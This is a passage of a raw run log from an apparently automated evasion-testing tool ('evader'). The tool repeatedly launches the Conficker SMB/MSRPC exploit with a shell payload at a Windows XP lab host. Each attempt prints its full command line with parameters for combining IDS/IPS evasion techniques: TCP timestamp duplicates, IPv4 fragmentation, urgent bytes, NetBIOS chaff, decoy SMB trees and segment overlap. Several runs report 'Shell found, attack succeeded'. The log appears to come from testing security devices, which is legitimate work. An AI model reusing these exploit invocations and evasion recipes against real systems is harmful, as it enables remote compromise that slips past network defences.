1181. Info: Using random seed QiqTvuFtUiB
1182. The following evasions are applied from stage smb_opentree to end:
1183. - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
1184. The duplicate packet has identical payload except that alphabetic characters are randomized
1185. The following evasions are applied from stage smb_openpipe to msrpc_req:
1186. - Add a random alphanumeric urgent data byte to every 1 TCP segment.
1187.  
1188. Info: NetBIOS connection 10.62.90.116:13639 -> 10.35.1.207:445
1189. Terminated
1190. ......
1191. 28150 runs averaging 1.76 runs / second ; progress: 15966/43200.......
1192. 28157 runs averaging 1.76 runs / second ; progress: 15971/43200.......
1193. 28164 runs averaging 1.76 runs / second ; progress: 15976/43200..........
1194. 28174 runs averaging 1.76 runs / second ; progress: 15981/43200..............
1195. 28188 runs averaging 1.76 runs / second ; progress: 15986/43200............2015-11-29 18:52:22 INFO
1196. Success. (10.62.90.116):
1197. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43646 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=SZGGJgzT8+g --evasion=[start,smb_connect]tcp_paws,"8","1","shuffle30" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","268435455","random" --verifydelay=1000 --payload=shell
1198. Info: Using random seed SZGGJgzT8+h
1199. The following evasions are applied from stage start to smb_connect:
1200. - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has 30 bytes of original payload, then shuffled original payload
1201. The following evasions are applied from stage netbios_connect to msrpc_req:
1202. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random bytes as payload
1203.  
1204. Info: NetBIOS connection 10.62.90.116:43646 -> 10.35.1.207:445
1205. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
1206. Info: Sending MSRPC request with exploit
1207. Info: Shell found, attack succeeded
1208. Info: CommandShell::SendCommand() - Failed to send string
1209. Info: Command shell connection reset.
1210. Info: Shell closed
1211. 0: Success.
1212. .
1213. 28202 runs averaging 1.76 runs / second ; progress: 15991/43200...............
1214. 28217 runs averaging 1.76 runs / second ; progress: 15996/43200.2015-11-29 18:52:27 INFO
1215. Success. (10.62.90.116):
1216. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=65461 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Msb/Ot5EHnw --evasion=[smb_openpipe,msrpc_req]ipv4_frag,"24" --evasion=[start,end]tcp_paws,"3","6","alpharandomized" --evasion=[smb_opentree,msrpc_bind]tcp_seg,"1" --verifydelay=1000 --payload=shell
1217. Info: Using random seed Msb/Ot5EHnw
1218. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphabetic bytes randomized
1219. The following evasions are applied from stage smb_opentree to msrpc_bind:
1220. - TCP packets are segmented to contain at most 1 bytes of payload.
1221. The following evasions are applied from stage smb_openpipe to msrpc_req:
1222. - IPv4 fragments with at most 24 bytes per fragment
1223.  
1224. Info: NetBIOS connection 10.62.90.116:65461 -> 10.35.1.207:445
1225. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
1226. Info: Sending MSRPC request with exploit
1227. Info: Shell found, attack succeeded
1228. Info: Shell closed
1229. 0: Success.
1230. ............
1231. 28231 runs averaging 1.76 runs / second ; progress: 16001/43200..2015-11-29 18:52:34 INFO
1232. Success. (10.62.90.116):
1233. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38050 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=xGZ1/aGMnEk --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"1448" --evasion=[netbios_connect,msrpc_req]netbios_chaff,"50%","msrpc_req" --evasion=[netbios_connect,end]tcp_paws,"75%","4","shuffle" --verifydelay=1000 --payload=shell
1234. Info: Using random seed xGZ1/aGMnEn
1235. The following evasions are applied from stage netbios_connect to end:
1236. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has shuffled original payload
1237. The following evasions are applied from stage netbios_connect to msrpc_req:
1238. - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
1239. The following evasions are applied from stage smb_openpipe to msrpc_bind:
1240. - IPv4 fragments with at most 1448 bytes per fragment
1241.  
1242. Info: NetBIOS connection 10.62.90.116:38050 -> 10.35.1.207:445
1243. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
1244. Info: Sending MSRPC request with exploit
1245. Info: Shell found, attack succeeded
1246. Info: Shell closed
1247. 0: Success.
1248. ..
1249. 28236 runs averaging 1.76 runs / second ; progress: 16006/43200...
1250. 28239 runs averaging 1.76 runs / second ; progress: 16011/43200..........
1251. 28249 runs averaging 1.76 runs / second ; progress: 16016/43200.........
1252. 28258 runs averaging 1.76 runs / second ; progress: 16021/43200................
1253. 28274 runs averaging 1.76 runs / second ; progress: 16026/43200................
1254. 28290 runs averaging 1.76 runs / second ; progress: 16031/43200........
1255. 28298 runs averaging 1.76 runs / second ; progress: 16036/43200....Pid 9020 timed out - killed
1256. 2015-11-29 18:53:10 INFO
1257. Timed out (10.62.90.111):
1258. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33477 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=CHrh0o4+Eik --evasion=[start,smb_openpipe]tcp_paws,"75%","10","alpharandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
1259. Info: Using random seed CHrh0o4+Eik
1260. The following evasions are applied from stage start to smb_openpipe:
1261. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has original payload with alphabetic bytes randomized
1262. The following evasions are applied from stage smb_openpipe to msrpc_bind:
1263. - 75% probability to add a random alphaurgent data byte to a TCP segment.
1264.  
1265. Info: NetBIOS connection 10.62.90.111:33477 -> 10.35.1.207:445
1266. Terminated
1267. .....
1268. 28308 runs averaging 1.76 runs / second ; progress: 16041/43200.........
1269. 28317 runs averaging 1.76 runs / second ; progress: 16046/43200.........
1270. 28326 runs averaging 1.76 runs / second ; progress: 16052/43200..........
1271. 28336 runs averaging 1.76 runs / second ; progress: 16057/43200......
1272. 28342 runs averaging 1.76 runs / second ; progress: 16062/43200.....
1273. 28347 runs averaging 1.76 runs / second ; progress: 16067/43200.........
1274. 28356 runs averaging 1.76 runs / second ; progress: 16072/43200...2015-11-29 18:53:44 INFO
1275. Success. (10.62.90.116):
1276. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63149 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Jl4yonimAlo --evasion=[smb_connect,msrpc_req]smb_decoytrees,"2","1","2","random_msrpcreq" --evasion=[start,end]tcp_paws,"75%","8","zero" --verifydelay=1000 --payload=shell
1277. Info: Using random seed Jl4yonimAlo
1278. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 0x00 bytes as payload
1279. The following evasions are applied from stage smb_connect to msrpc_req:
1280. - Before normal SMB writes, 2 SMB trees are opened and 1 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
1281.  
1282. Info: NetBIOS connection 10.62.90.116:63149 -> 10.35.1.207:445
1283. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
1284. Info: Sending MSRPC request with exploit
1285. Info: Shell found, attack succeeded
1286. Info: Shell closed
1287. 0: Success.
1288. ........
1289. 28368 runs averaging 1.76 runs / second ; progress: 16077/432002015-11-29 18:53:47 INFO
1290. Success. (10.62.90.116):
1291. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43826 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=PC0BS/oNbts --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","8","alpharandomized" --evasion=[msrpc_bind,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
1292. Info: Using random seed PC0BS/oNbts
1293. The following evasions are applied from stage netbios_connect to msrpc_req:
1294. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has original payload with alphabetic bytes randomized
1295. The following evasions are applied from stage msrpc_bind to msrpc_req:
1296. - TCP timestamps echo reply value is sent in the wrong endianness
1297.  
1298. Info: NetBIOS connection 10.62.90.116:43826 -> 10.35.1.207:445
1299. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
1300. Info: Sending MSRPC request with exploit
1301. Info: Shell found, attack succeeded
1302. Info: Command shell connection reset.
1303. Info: CommandShell::SendCommand() - Failed to send string
1304. Info: Shell closed
1305. 0: Success.
1306. ...........
1307. 28380 runs averaging 1.76 runs / second ; progress: 16082/43200..........
1308. 28390 runs averaging 1.76 runs / second ; progress: 16087/43200............
1309. 28402 runs averaging 1.77 runs / second ; progress: 16092/43200.......Pid 10253 timed out - killed
1310. 2015-11-29 18:54:05 INFO
1311. Timed out (10.62.90.113):
1312. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15281 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=oEsZ7fgDE68 --evasion=[start,smb_openpipe]ipv4_frag,"1472" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
1313. Info: Using random seed oEsZ7fgDE6+
1314. The following evasions are applied from stage start to smb_openpipe:
1315. - IPv4 fragments with at most 1472 bytes per fragment
1316. The following evasions are applied from stage smb_openpipe to msrpc_bind:
1317. - 50% probability to add a zero urgent data byte to a TCP segment.
1318.  
1319. Info: NetBIOS connection 10.62.90.113:15281 -> 10.35.1.207:445
1320. Terminated
1321. .......
1322. 28417 runs averaging 1.77 runs / second ; progress: 16097/43200....
1323. 28421 runs averaging 1.77 runs / second ; progress: 16102/43200......
1324. 28427 runs averaging 1.76 runs / second ; progress: 16107/43200....
1325. 28431 runs averaging 1.76 runs / second ; progress: 16112/43200....
1326. 28435 runs averaging 1.76 runs / second ; progress: 16117/43200.
1327. 28436 runs averaging 1.76 runs / second ; progress: 16122/43200.....
1328. 28441 runs averaging 1.76 runs / second ; progress: 16127/43200.......
1329. 28448 runs averaging 1.76 runs / second ; progress: 16132/43200.....
1330. 28453 runs averaging 1.76 runs / second ; progress: 16137/43200......
1331. 28459 runs averaging 1.76 runs / second ; progress: 16142/43200......
1332. 28465 runs averaging 1.76 runs / second ; progress: 16147/43200.............
1333. 28478 runs averaging 1.76 runs / second ; progress: 16152/43200..........
1334. 28488 runs averaging 1.76 runs / second ; progress: 16157/43200..........Pid 11292 timed out - killed
1335. 2015-11-29 18:55:12 INFO
1336. Timed out (10.62.90.117):
1337. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37589 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=/44Lb9fhL+E --evasion=[smb_connect,smb_opentree]smb_writeandxpad,"7","random_alphanum" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
1338. Info: Using random seed /44Lb9fhL+H
1339. The following evasions are applied from stage smb_connect to smb_opentree:
1340. - 7 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
1341. The following evasions are applied from stage smb_opentree to msrpc_bind:
1342. - Add a random alphaurgent data byte to every 2 TCP segment.
1343.  
1344. Info: NetBIOS connection 10.62.90.117:37589 -> 10.35.1.207:445
1345. Terminated
1346.  
1347. 28499 runs averaging 1.76 runs / second ; progress: 16162/43200.....Pid 11315 timed out - killed
1348. 2015-11-29 18:55:14 INFO
1349. Timed out (10.62.90.112):
1350. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23858 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=TUOmd39n/3I --evasion=[smb_opentree,msrpc_bind]netbios_chaff,"13","empty_keepalive|small_unspec|http_get|msrpc_req|broken_length" --evasion=[smb_opentree,end]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
1351. Info: Using random seed TUOmd39n/3J
1352. The following evasions are applied from stage smb_opentree to end:
1353. - Add a random urgent data byte to every 2 TCP segment.
1354. The following evasions are applied from stage smb_opentree to msrpc_bind:
1355. - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
1356.  
1357. Info: NetBIOS connection 10.62.90.112:23858 -> 10.35.1.207:445
1358. Terminated
1359. ........2015-11-29 18:55:17 INFO
1360. Success. (10.62.90.114):
1361. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34627 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=Fyro1IIugKo --evasion=[smb_openpipe,msrpc_bind]ipv4_opt,"2","inc","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_paws,"25%","10","zero" --verifydelay=1000 --payload=shell
1362. Info: Using random seed Fyro1IIugKo
1363. The following evasions are applied from stage smb_opentree to msrpc_req:
1364. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has 0x00 bytes as payload
1365. The following evasions are applied from stage smb_openpipe to msrpc_bind:
1366. - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
1367. The duplicate packet has random alphabetic bytes as payload
1368.  
1369. Info: NetBIOS connection 10.62.90.114:34627 -> 10.35.1.207:445
1370. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
1371. Info: Sending MSRPC request with exploit
1372. Info: Shell found, attack succeeded
1373. Info: Shell closed
1374. 0: Success.
1375. ...
1376. 28517 runs averaging 1.76 runs / second ; progress: 16167/43200................
1377. 28533 runs averaging 1.76 runs / second ; progress: 16172/43200........
1378. 28541 runs averaging 1.76 runs / second ; progress: 16177/43200...
1379. 28544 runs averaging 1.76 runs / second ; progress: 16182/43200...........
1380. 28555 runs averaging 1.76 runs / second ; progress: 16187/43200...................
1381. 28574 runs averaging 1.76 runs / second ; progress: 16192/43200.............
1382. 28587 runs averaging 1.76 runs / second ; progress: 16197/43200....
1383. 28591 runs averaging 1.76 runs / second ; progress: 16202/43200...........
1384. 28602 runs averaging 1.76 runs / second ; progress: 16207/43200......
1385. 28608 runs averaging 1.76 runs / second ; progress: 16212/43200.......Pid 11803 timed out - killed
1386. 2015-11-29 18:56:06 INFO
1387. Timed out (10.62.90.115):
1388. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22964 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=LeqaqL5XwYM --evasion=[smb_connect,msrpc_req]tcp_segvar,"1","65535" --evasion=[smb_openpipe,end]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
1389. Info: Using random seed LeqaqL5XwYM
1390. The following evasions are applied from stage smb_connect to msrpc_req:
1391. - TCP packets are segmented to contain between 1 and 65535 bytes of payload.
1392. The following evasions are applied from stage smb_openpipe to end:
1393. - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
1394.  
1395. Info: NetBIOS connection 10.62.90.115:22964 -> 10.35.1.207:445
1396. Terminated
1397. ......
1398. 28622 runs averaging 1.76 runs / second ; progress: 16217/43200.2015-11-29 18:56:09 INFO
1399. Success. (10.62.90.115):
1400. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60975 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=ilnMy/qVBQY --evasion=[smb_opentree,end]smb_decoytrees,"5","3","7","random_msrpcreq" --evasion=[smb_openpipe,msrpc_req]tcp_overlap,"1245","new","random_alpha" --verifydelay=1000 --payload=shell
1401. Info: Using random seed ilnMy/qVBQa
1402. The following evasions are applied from stage smb_opentree to end:
1403. - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
1404. The following evasions are applied from stage smb_openpipe to msrpc_req:
1405. - TCP segments are set to overlap by 1245 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
1406.  
1407. Info: NetBIOS connection 10.62.90.115:60975 -> 10.35.1.207:445
1408. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
1409. Info: Sending MSRPC request with exploit
1410. Info: Shell found, attack succeeded
1411. Info: Command shell connection reset.
1412. Info: CommandShell::SendCommand() - Failed to send string
1413. Info: Shell closed
1414. 0: Success.
1415. ...........
1416. 28635 runs averaging 1.77 runs / second ; progress: 16222/43200..2015-11-29 18:56:14 INFO
1417. Success. (10.62.90.115):
1418. /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31595 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=bktDO+ILREo --evasion=[netbios_connect,end]ipv4_frag,"40" --evasion=[smb_connect,end]smb_decoytrees,"3","1","3","random_msrpcreq" --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"2","4","1","random_alphanum" --verifydelay=1000 --payload=shell
1419. Info: Using random seed bktDO+ILREp
1420. The following evasions are applied from stage netbios_connect to end:
1421. - IPv4 fragments with at most 40 bytes per fragment
1422. The following evasions are applied from stage smb_connect to end:
1423. - Before normal SMB writes, 3 SMB trees are opened and 1 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
1424. The following evasions are applied from stage smb_openpipe to msrpc_req:
1425. - Before normal SMB writes, 2 SMB trees are opened and 4 writes are performed to them. The write payload is 1 random alphanumeric bytes.
1426.  
1427. Info: NetBIOS connection 10.62.90.115:31595 -> 10.35.1.207:445
1428. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
1429. Info: Sending MSRPC request with exploit
1430. Info: Shell found, attack succeeded
1431. Info: Shell closed
1432. 0: Success.
1433. ...........Interrupt registered, soft shutdown